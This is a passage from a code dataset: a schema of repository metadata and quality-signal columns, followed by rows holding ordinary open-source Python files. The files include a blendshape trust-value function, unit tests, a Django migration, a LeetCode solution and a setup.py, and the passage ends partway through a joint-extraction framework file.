Schema: one row per source file, with repository metadata, the file text (`content`), and per-file quality signals. Each column's dtype follows its name below.

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
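Given this schema, here is a minimal sketch of how rows like the ones below could be loaded and screened on their quality signals. The Parquet file name and the thresholds are illustrative assumptions, not part of this dataset's documentation:

```python
import pandas as pd

# Hypothetical file name; the actual storage location is not given here.
df = pd.read_parquet("code_quality_signals.parquet")

# Keep Python files with a low duplicate-10-gram fraction that also parse
# as a valid AST (qsc_codepython_cate_ast_quality_signal == 1).
keep = df[
    (df["lang"] == "Python")
    & (df["qsc_code_frac_chars_dupe_10grams_quality_signal"] < 0.1)
    & (df["qsc_codepython_cate_ast_quality_signal"] == 1.0)
]
print(len(keep), "of", len(df), "files kept")
```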
---

hexsha: f1c021de79d124febfa8a831e976cd4dc12aeed9 | size: 1,647 | ext: py | lang: Python

max_stars: src/compute_trust_values.py in johndpope/FacialRetargeting @ 5fb0c1da6af6c3d59aef264f567bfa7a244d0764, licenses ["MIT"], count 21, events 2020-08-19T02:52:16.000Z to 2022-02-25T12:35:04.000Z
max_issues: same path/repo/commit, licenses ["MIT"], count 3, events 2020-10-16T07:11:25.000Z to 2021-06-30T10:26:04.000Z
max_forks: same path/repo/commit, licenses ["MIT"], count 7, events 2020-08-24T08:30:53.000Z to 2022-03-28T15:55:24.000Z

content:
```python
import numpy as np

from src.compute_corr_coef import compute_corr_coef
from utils.plotting import plot_similarities


def compute_trust_values(dsk, do_plot=False):
    """
    Compute trust values following formula 6

    k := number of blendshapes
    n := num_features (num_markers*3)

    :param dsk: delta_sk vector (k, n)
    :param do_plot: decide if we want to plot the between-correlation matrix
    :return: trust values vector (k,)
    """
    if len(np.shape(dsk)) != 2:
        raise ValueError("[COMPUTE TRUST VALUE] dsk dimensions not supported ({}) instead of 2".format(len(np.shape(dsk))))

    # compute between-blendshape correlation
    ckl = compute_corr_coef(dsk, dsk)
    ckl = np.maximum(ckl, np.zeros(np.shape(ckl)))
    if do_plot:
        plot_similarities(ckl, "Between blendshapes correlation", vmin=0, vmax=1)

    # compute lower triangle
    num_k = np.shape(ckl)[0]
    low_trig = np.zeros(num_k)
    for k in range(num_k):
        val = 0
        for l in range(k):
            val += ckl[k, l]
        low_trig[k] = val
    max_low_trig = np.max(low_trig)

    # compute trust values (formula 6)
    tk = np.zeros(num_k)
    for k in range(len(tk)):
        tk[k] = 1 - low_trig[k] / max_low_trig
    return tk


if __name__ == '__main__':
    """
    test compute_trust_values function

    run: python -m src.compute_trust_values
    """
    np.random.seed(0)
    from utils.re_order_delta import re_order_delta

    # test compute trust values
    sk = np.random.rand(6, 3)  # (k, n)
    sorted_sk = re_order_delta(sk)
    tk = compute_trust_values(sorted_sk, do_plot=False)
    print("tk")
    print(tk)
```
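The docstring cites "formula 6" without stating it. Reconstructed from the loops above (an inference from the code, not a quotation of the underlying paper), the quantity computed appears to be

$$t_k \;=\; 1 - \frac{\sum_{l<k} c_{kl}}{\max_j \sum_{l<j} c_{jl}}, \qquad c_{kl} = \max\bigl(\operatorname{corr}(\delta s_k, \delta s_l),\, 0\bigr),$$

so the blendshape whose cumulative lower-triangle correlation is largest receives trust 0, and an uncorrelated blendshape receives trust 1.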
avg_line_length: 26.564516 | max_line_length: 123 | alphanum_fraction: 0.651488
qsc_*_quality_signal values (schema order): 252 | 1,647 | 4.055556 | 0.353175 | 0.093933 | 0.123288 | 0.02544 | 0.043053 | 0.043053 | 0.043053 | 0.043053 | 0 | 0 | 0 | 0.010383 | 0.23983 | 1,647 | 61 | 124 | 27 | 0.805911 | 0.226472 | 0 | 0 | 0 | 0 | 0.096035 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.133333 | 0 | 0.2 | 0.066667
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1c16c5d4d00c03eee3d9db1e1fe2c9c3aca5189 | size: 2,042 | ext: py | lang: Python

max_stars: test/core/test_constant.py in haikusw/jaqalpaq @ d507e894cb897756a1e51c99582b736254995b4e, licenses ["Apache-2.0"], count 8, events 2021-02-19T23:25:28.000Z to 2021-09-24T20:11:13.000Z
max_issues: same path/repo/commit, licenses ["Apache-2.0"], count/events null
max_forks: same path/repo/commit, licenses ["Apache-2.0"], count/events null

content:
```python
import unittest

from jaqalpaq.core.parameter import ParamType
from jaqalpaq.core.constant import Constant
from . import randomize
from . import common


class ConstantTester(unittest.TestCase):
    def test_valid_types(self):
        """Test that a Constant can only be created from valid types."""
        valid_values = [
            (randomize.random_float(), ParamType.FLOAT),
            (randomize.random_integer(), ParamType.INT),
        ]
        for value, kind in valid_values:
            const, name, _ = common.make_random_constant(
                value=value, return_params=True
            )
            self.assertEqual(kind, const.kind)
            self.assertEqual(name, const.name)
        # Note that we can also create a Constant from another Constant, but Jaqal
        # currently cannot make use of this functionality.
        reg = common.make_random_register()
        qubit = common.choose_random_qubit_getitem(reg)
        invalid_values = [None, reg, qubit]
        for value in invalid_values:
            with self.assertRaises(Exception):
                Constant(randomize.random_identifier(), value)

    def test_value(self):
        """Test that a constant yields the same value it was created with."""
        const, _, value = common.make_random_constant(return_params=True)
        common.assert_values_same(self, value, const.value)

    def test_resolve_value(self):
        """Test that constants ignore the context given in resolve_value and
        return their stored value."""
        const = common.make_random_constant()
        other_const = common.make_random_constant()
        context = {const.name: other_const.value}
        exp_value = const.value
        act_value = const.resolve_value(context)
        common.assert_values_same(self, exp_value, act_value)

    def test_classical(self):
        """Test that all constants are appropriately labeled as classical."""
        self.assertTrue(common.make_random_constant().classical)


if __name__ == "__main__":
    unittest.main()
```
avg_line_length: 37.127273 | max_line_length: 82 | alphanum_fraction: 0.669931
qsc_*_quality_signal values (schema order): 244 | 2,042 | 5.393443 | 0.368852 | 0.045593 | 0.072948 | 0.091185 | 0.115502 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246327 | 2,042 | 54 | 83 | 37.814815 | 0.855101 | 0.196866 | 0 | 0 | 0 | 0 | 0.004969 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 1 | 0.108108 | false | 0 | 0.135135 | 0 | 0.27027 | 0
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1c26fda7f69a42db47f3f5783c055c679831e9b | size: 8,035 | ext: py | lang: Python

max_stars: src/richard/videos/migrations/0001_initial.py in pyvideo/richard @ 894f5380e07d7e66453fe730891a21aca32d8edb, licenses ["Apache-2.0"], count 51, events 2015-01-24T07:53:56.000Z to 2020-08-30T12:19:39.000Z
max_issues: same path, repo westurner/richard @ same commit, licenses ["Apache-2.0"], count 34, events 2015-02-23T11:15:00.000Z to 2016-01-04T11:25:42.000Z
max_forks: same path, repo westurner/richard @ same commit, licenses ["Apache-2.0"], count 16, events 2015-03-20T17:36:09.000Z to 2022-01-07T01:04:17.000Z

content:
```python
# -*- coding: utf-8 -*-
# richard -- video index system
# Copyright (C) 2012, 2013, 2014, 2015 richard contributors. See AUTHORS.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.

from __future__ import unicode_literals

from django.db import models, migrations


class Migration(migrations.Migration):

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('title', models.CharField(help_text='The complete title for the category. e.g. PyCon 2010', max_length=255)),
                ('description', models.TextField(default='', help_text='Use Markdown', blank=True)),
                ('url', models.URLField(default='', help_text='URL for the category. e.g. If this category was a conference, this would be the url for the conference web-site.', blank=True)),
                ('start_date', models.DateField(help_text='If the category was an event, then this is the start date for the event.', null=True, blank=True)),
                ('whiteboard', models.CharField(default='', help_text='Editor notes for this category.', max_length=255, blank=True)),
                ('slug', models.SlugField(unique=True)),
                ('added', models.DateTimeField(auto_now_add=True, null=True)),
            ],
            options={
                'ordering': ['title'],
                'verbose_name': 'category',
                'verbose_name_plural': 'categories',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Language',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('iso639_1', models.CharField(max_length=3)),
                ('name', models.CharField(max_length=20)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='RelatedUrl',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('url', models.URLField(max_length=255)),
                ('description', models.CharField(default='', max_length=255, blank=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Speaker',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=255)),
                ('slug', models.SlugField(unique=True)),
            ],
            options={
                'ordering': ['name'],
                'verbose_name': 'speaker',
                'verbose_name_plural': 'speakers',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Tag',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('tag', models.CharField(max_length=30)),
            ],
            options={
                'ordering': ['tag'],
                'verbose_name': 'tag',
                'verbose_name_plural': 'tags',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Video',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('state', models.IntegerField(default=2, choices=[(1, 'Live'), (2, 'Draft')])),
                ('title', models.CharField(max_length=255)),
                ('summary', models.TextField(default='', help_text='Use Markdown', blank=True)),
                ('description', models.TextField(default='', help_text='Use Markdown', blank=True)),
                ('quality_notes', models.TextField(default='', blank=True)),
                ('copyright_text', models.TextField(blank=True)),
                ('embed', models.TextField(blank=True)),
                ('thumbnail_url', models.URLField(max_length=255, null=True, blank=True)),
                ('duration', models.IntegerField(help_text=b'In seconds', null=True, blank=True)),
                ('video_ogv_length', models.IntegerField(null=True, blank=True)),
                ('video_ogv_url', models.URLField(max_length=255, null=True, blank=True)),
                ('video_ogv_download_only', models.BooleanField(default=False)),
                ('video_mp4_length', models.IntegerField(null=True, blank=True)),
                ('video_mp4_url', models.URLField(max_length=255, null=True, blank=True)),
                ('video_mp4_download_only', models.BooleanField(default=False)),
                ('video_webm_length', models.IntegerField(null=True, blank=True)),
                ('video_webm_url', models.URLField(max_length=255, null=True, blank=True)),
                ('video_webm_download_only', models.BooleanField(default=False)),
                ('video_flv_length', models.IntegerField(null=True, blank=True)),
                ('video_flv_url', models.URLField(max_length=255, null=True, blank=True)),
                ('video_flv_download_only', models.BooleanField(default=False)),
                ('source_url', models.URLField(max_length=255, null=True, blank=True)),
                ('whiteboard', models.CharField(default='', max_length=255, blank=True)),
                ('recorded', models.DateField(null=True, blank=True)),
                ('added', models.DateTimeField(auto_now_add=True)),
                ('updated', models.DateTimeField(auto_now=True)),
                ('slug', models.SlugField(unique=True)),
                ('category', models.ForeignKey(related_name='videos', to='videos.Category')),
                ('language', models.ForeignKey(to='videos.Language', null=True)),
                ('speakers', models.ManyToManyField(related_name='videos', to='videos.Speaker', blank=True)),
                ('tags', models.ManyToManyField(related_name='videos', to='videos.Tag', blank=True)),
            ],
            options={
                'ordering': ['-recorded', 'title'],
                'get_latest_by': 'recorded',
                'verbose_name': 'video',
                'verbose_name_plural': 'videos',
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='VideoUrlStatus',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('check_date', models.DateTimeField()),
                ('status_code', models.IntegerField()),
                ('status_message', models.CharField(max_length=255, blank=True)),
                ('url', models.URLField(max_length=255)),
                ('video', models.ForeignKey(to='videos.Video')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.AddField(
            model_name='relatedurl',
            name='video',
            field=models.ForeignKey(related_name='related_urls', to='videos.Video'),
            preserve_default=True,
        ),
    ]
```
avg_line_length: 49.598765 | max_line_length: 191 | alphanum_fraction: 0.571873
qsc_*_quality_signal values (schema order): 827 | 8,035 | 5.417171 | 0.247884 | 0.052232 | 0.040179 | 0.04933 | 0.566518 | 0.500893 | 0.422545 | 0.320089 | 0.227902 | 0.216741 | 0 | 0.014311 | 0.28687 | 8,035 | 161 | 192 | 49.906832 | 0.767539 | 0.093964 | 0 | 0.410072 | 0 | 0.007194 | 0.17541 | 0.012805 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.014388 | 0 | 0.035971 | 0
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1c41c955777189a3b733180afda82b9ed458a7c | size: 1,399 | ext: py | lang: Python

max_stars: descwl_shear_sims/tests/test_artifacts.py in LSSTDESC/descwl_shear_sims @ 1c696518104b7f301dd6c69571239431c6232110, licenses ["BSD-3-Clause"], count/events null
max_issues: same path/repo/commit, licenses ["BSD-3-Clause"], count 11, events 2019-12-10T23:30:27.000Z to 2019-12-24T13:59:32.000Z
max_forks: same path, repo LSSTDESC/wl-shear-testing-sims @ 6e4a0baa6f664b5bc52b08b55614eaa58c8b0748, licenses ["BSD-3-Clause"], count/events null

content:
"""
copy-paste from my (beckermr) personal code here
https://github.com/beckermr/metadetect-coadding-sims
"""
import numpy as np
import galsim
from descwl_shear_sims.masking import get_bmask_and_set_image
from descwl_shear_sims.artifacts import (
generate_bad_columns,
generate_cosmic_rays,
)
def test_basic_mask():
image = galsim.ImageD(np.zeros((100, 100)))
bmask = get_bmask_and_set_image(
image=image, rng=None, cosmic_rays=False, bad_columns=False,
)
assert np.all(bmask.array == 0)
def test_generate_cosmic_rays_smoke():
rng = np.random.RandomState(seed=10)
msk = generate_cosmic_rays(shape=(64, 64), rng=rng)
assert np.any(msk)
def test_generate_cosmic_rays_seed():
rng = np.random.RandomState(seed=10)
msk1 = generate_cosmic_rays(shape=(64, 64), rng=rng)
rng = np.random.RandomState(seed=10)
msk2 = generate_cosmic_rays(shape=(64, 64), rng=rng)
assert np.array_equal(msk1, msk2)
def test_generate_bad_columns_smoke():
rng = np.random.RandomState(seed=10)
msk = generate_bad_columns(shape=(64, 64), rng=rng)
assert np.any(msk)
def test_generate_bad_columns_seed():
rng = np.random.RandomState(seed=10)
msk1 = generate_bad_columns(shape=(64, 64), rng=rng)
rng = np.random.RandomState(seed=10)
msk2 = generate_bad_columns(shape=(64, 64), rng=rng)
assert np.array_equal(msk1, msk2)
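The `*_seed` tests rest on NumPy's legacy `RandomState` being fully deterministic for a fixed seed. A standalone illustration of that property, independent of this test suite:

```python
import numpy as np

# Two generators constructed with the same seed yield identical streams,
# which is exactly what the *_seed tests above assert for the mask generators.
a = np.random.RandomState(seed=10).uniform(size=5)
b = np.random.RandomState(seed=10).uniform(size=5)
assert np.array_equal(a, b)
```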
avg_line_length: 25.436364 | max_line_length: 68 | alphanum_fraction: 0.719085
qsc_*_quality_signal values (schema order): 211 | 1,399 | 4.530806 | 0.279621 | 0.050209 | 0.112971 | 0.138075 | 0.65272 | 0.539749 | 0.539749 | 0.539749 | 0.518828 | 0.351464 | 0 | 0.043404 | 0.160114 | 1,399 | 54 | 69 | 25.907407 | 0.770213 | 0.072194 | 0 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151515 | 1 | 0.151515 | false | 0 | 0.121212 | 0 | 0.272727 | 0
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1c47788397390c41f153d775e370f60b472f99d | size: 628 | ext: py | lang: Python

max_stars: leetcode_submissions/7.reverse-integer.18198620.ac.py in aenon/online_judge @ bff3991519cd4f2d80dea9b17680dbc5d4c44b9b, licenses ["MIT"], count/events null
max_issues: same path/repo/commit, licenses ["MIT"], count/events null
max_forks: same path/repo/commit, licenses ["MIT"], count 1, events 2015-01-10T16:02:43.000Z to 2015-01-10T16:02:43.000Z

content:
```python
#!/usr/bin/env python
# Reverse Integer  https://oj.leetcode.com/problems/reverse-integer/
# Reverse digits of an integer.
# Example1: x = 123, return 321
# Example2: x = -123, return -321
# Math
# Xilin SUN
# Dec 7 2014


class Solution:
    # @return an integer
    def reverse(self, x):
        if x > 2147483646:
            return 0
        if x < -2147483647:
            return 0
        isPositive = True
        if x < 0:
            isPositive = False
            x = -x
        rev = 0
        while x != 0:
            rev = 10 * rev + x % 10
            # Floor division; the original Python 2 `x = x / 10` would produce
            # floats (and never terminate) under Python 3.
            x = x // 10
            if rev > 2147483646:
                return 0
            if rev < -2147483647:
                return 0
        if isPositive:
            return rev
        return -rev
```
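A quick sanity check against the examples in the header comments (a hypothetical driver, not part of the submission; the third case is an added overflow check whose reversal, 9646324351, exceeds the 32-bit bound):

```python
s = Solution()
assert s.reverse(123) == 321
assert s.reverse(-123) == -321
assert s.reverse(1534236469) == 0  # reversed value overflows a signed 32-bit int
```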
avg_line_length: 19.030303 | max_line_length: 68 | alphanum_fraction: 0.593949
qsc_*_quality_signal values (schema order): 91 | 628 | 4.098901 | 0.43956 | 0.075067 | 0.072386 | 0.069705 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164384 | 0.302548 | 628 | 33 | 69 | 19.030303 | 0.687215 | 0.353503 | 0 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0 | 0 | 0.380952 | 0
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1c529b5976d0a2cdf007169fc8e0ee8525206e1 | size: 1,400 | ext: py | lang: Python

max_stars: src/z3c/configurator/tests.py in zopefoundation/z3c.configurator @ 390416d2fa61ddf97c28e6af32eae3660bb725e2, licenses ["ZPL-2.1"], count/events null
max_issues: same path/repo/commit, licenses ["ZPL-2.1"], count 1, events 2021-01-08T15:34:08.000Z to 2021-01-08T15:34:08.000Z
max_forks: same path/repo/commit, licenses ["ZPL-2.1"], count 1, events 2015-04-03T05:49:32.000Z to 2015-04-03T05:49:32.000Z

content:
```python
##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
#############################################################################
"""Configurator Test Setup"""
import re
import doctest

from zope.component import testing
from zope.testing.renormalizing import RENormalizing


def setUp(test):
    testing.setUp(test)


def tearDown(test):
    testing.tearDown()


def test_suite():
    checker = RENormalizing((
        (re.compile("u'(.*?)'"), "'\\1'"),
        (re.compile("<type 'unicode'>"), "<class 'str'>"),
        (re.compile("zope.schema._bootstrapinterfaces.RequiredMissing"),
         "RequiredMissing"),
        (re.compile("zope.schema._bootstrapinterfaces.WrongType"),
         "WrongType"),
    ))
    return doctest.DocFileSuite(
        'README.txt',
        setUp=setUp, tearDown=tearDown, checker=checker,
        optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)
```
avg_line_length: 31.818182 | max_line_length: 78 | alphanum_fraction: 0.620714
qsc_*_quality_signal values (schema order): 145 | 1,400 | 5.965517 | 0.565517 | 0.041619 | 0.03237 | 0.043931 | 0.087861 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005988 | 0.165 | 1,400 | 43 | 79 | 32.55814 | 0.733961 | 0.342857 | 0 | 0 | 0 | 0 | 0.221629 | 0.12016 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.190476 | 0 | 0.380952 | 0
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1c6b2f9d9acd98dcef1131f691572e33395120a | size: 528 | ext: py | lang: Python

max_stars: time_to_speech.py in besi/stereopi @ c03a1ae990af67dde4e2cd832a20b49d697de230, licenses ["MIT"], count 2, events 2020-02-18T18:10:50.000Z to 2020-08-04T21:00:29.000Z
max_issues: same path/repo/commit, licenses ["MIT"], count 4, events 2020-02-19T10:46:02.000Z to 2021-01-09T18:52:45.000Z
max_forks: same path/repo/commit, licenses ["MIT"], count/events null

content:
```python
# Credits go to <http://codereview.stackexchange.com/q/37522>
import random
import time


def current_time():
    '''Returns a tuple containing (hour, minute) for current local time.'''
    local_time = time.localtime(time.time())
    return (local_time.tm_hour, local_time.tm_min)


(hour, minute) = current_time()


def ishtime(hours, minutes):
    hours = hours % 24
    if minutes == 0:
        return(str(hours) + ' sharp')
    return(str(hours) + ' . . . and ' + str(minutes) + ' minutes')


print(ishtime(hour, minute))
```
avg_line_length: 22 | max_line_length: 75 | alphanum_fraction: 0.657197
qsc_*_quality_signal values (schema order): 70 | 528 | 4.857143 | 0.514286 | 0.105882 | 0.064706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018824 | 0.195076 | 528 | 23 | 76 | 22.956522 | 0.781176 | 0.238636 | 0 | 0 | 0 | 0 | 0.063131 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.416667 | 0.083333
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1c6e01e5913573733f519b9c5d164e6fed7195b | size: 575 | ext: py | lang: Python

max_stars: setup.py in ckuzma/solar-viability-tester @ c34d03d1914374279ca269ab402eb5074f7555a6, licenses ["MIT"], count/events null
max_issues: same path/repo/commit, licenses ["MIT"], count 2, events 2017-04-03T13:59:00.000Z to 2017-04-06T04:57:50.000Z
max_forks: same path/repo/commit, licenses ["MIT"], count/events null

content:
```python
from setuptools import setup, find_packages
from codecs import open
from os import path

here = path.abspath(path.dirname(__file__))

# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name='solar-viability-tester',
    version='1.0.0',
    description='Solar viability tester utilizing the AT&T IoT Starter Kit and PubNub.',
    long_description=long_description,
    url='https://github.com/ckuzma/solar-viability-tester',
    license='Apache-2.0'
)
```
avg_line_length: 30.263158 | max_line_length: 89 | alphanum_fraction: 0.707826
qsc_*_quality_signal values (schema order): 82 | 575 | 4.865854 | 0.621951 | 0.150376 | 0.150376 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012658 | 0.175652 | 575 | 18 | 90 | 31.944444 | 0.829114 | 0.078261 | 0 | 0 | 0 | 0 | 0.329412 | 0.043137 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.214286 | 0 | 0.214286 | 0
raw qsc_* counterparts (schema order): 0 ×3 | null | 0 ×24 | null | 0 ×12 | effective: 1 | hits: 0
---

hexsha: f1c78560c5fc55f8dc09c8791ab3fa9dcc1ccd67 | size: 31,028 | ext: py | lang: Python

max_stars: framework/framework.py in wbqhb/SEPC @ 1a5e03b70984b759b615424dc06f530d5de00f51, licenses ["MIT"], count/events null
max_issues: same path/repo/commit, licenses ["MIT"], count/events null
max_forks: same path/repo/commit, licenses ["MIT"], count/events null

content:
```python
# -*- coding: utf-8 -*-
# @Time : 2021/5/4 3:05 PM
# @Author : godwaitup
# @FileName: framework.py
# original framework for joint extraction.
import torch.optim as optim
from torch import nn
import os
import data_loader
import torch.nn.functional as F
import numpy as np
import json
from functools import partial
from data_loader import cmed_collate_fn
import torch


def _to_sub(triple_list, head_only=False, lang='ENGLISH'):
    ret = set()
    for triple in triple_list:
        # NOTE: the original used `lang is 'CHINESE'`; identity comparison on
        # strings is unreliable, so `==` is used here and below.
        if lang == 'CHINESE':
            triple = (triple[0].replace('$', ' ').lower(), triple[1], triple[2].replace('$', ' ').lower())
        if head_only:
            ret.add(triple[0].split(" ")[0])
        else:
            ret.add(triple[0])
    return ret


def _to_obj(triple_list, head_only=False, lang='ENGLISH'):
    ret = set()
    for triple in triple_list:
        if lang == 'CHINESE':
